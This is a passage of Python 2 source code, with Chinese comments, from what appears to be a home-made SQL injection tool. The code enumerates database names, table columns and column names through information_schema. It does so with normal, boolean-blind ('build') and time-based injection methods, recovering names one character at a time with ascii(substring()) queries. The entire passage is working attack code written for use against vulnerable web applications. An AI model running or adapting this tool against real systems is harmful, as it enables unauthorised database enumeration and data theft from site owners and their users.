logger.debug("Start table's %s column amount sqli..." % table_name)
retVal = build_injection(select="COUNT(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." % (i + 1))
retVal = build_injection(select="length(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data,
lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))
# 然后注column名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
retVal = build_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." % table_name)
retVal = time_injection(select="COUNT(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." % (i + 1))
retVal = time_injection(select="length(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data,
times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))
# 然后注columns名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
retVal = time_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))
# 把注入得到的columns_name列表转为元组
self.columns_name[database_name][table_name] = tuple(columns_name)
logger.info("Sqli result:")
# 输出所有的列名
for database_name in self.columns_name:
tables_name = ""
for table_name in self.columns_name[database_name]:
tables_name += table_name
tables_name += ','
columns_name = ""
for column_name in self.columns_name[database_name][table_name]:
columns_name += column_name
columns_name += ','
logger.info("Table %s has columns %s", table_name, columns_name)
logger.info("Database %s has tables %s", database_name, tables_name)
print "[*]Columns list:", self.columns_name
def get_database(self):
logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
# 先注databases的数量
databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)',
source='information_schema.SCHEMATA',
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
print "[*] databases_number: %d" % databases_number
# 每个循环跑一次databases的数据
for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True):
# 首先是database name的长度
logger.debug("Start %dth database length sqli..." % (i + 1))
databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)',
source='information_schema.SCHEMATA',
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))
# 然后注database name
logger.debug("Start %dth database name sqli..." % (i + 1))
databases_name = normal_injection(select='`SCHEMA_NAME`',
source='information_schema.SCHEMATA', limit=i,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = build_injection(select="COUNT(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
logger.debug("Start %dth database length sqli..." % (i + 1))
# 然后注databases_name 的 length
retVal = build_injection(select="length(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))
# 然后注databases名字
# 清空database_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = time_injection(select="COUNT(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
logger.debug("Start %dth database length sqli..." % (i + 1))
# 然后注databases_name 的 length
retVal = time_injection(select="length(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))
# 然后注databases名字
# 清空databases_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))
databases_name = ','.join(self.databases_name)
print "[*] databases_name list: " + databases_name
def print_log(log): logger.debug(log + '\n')
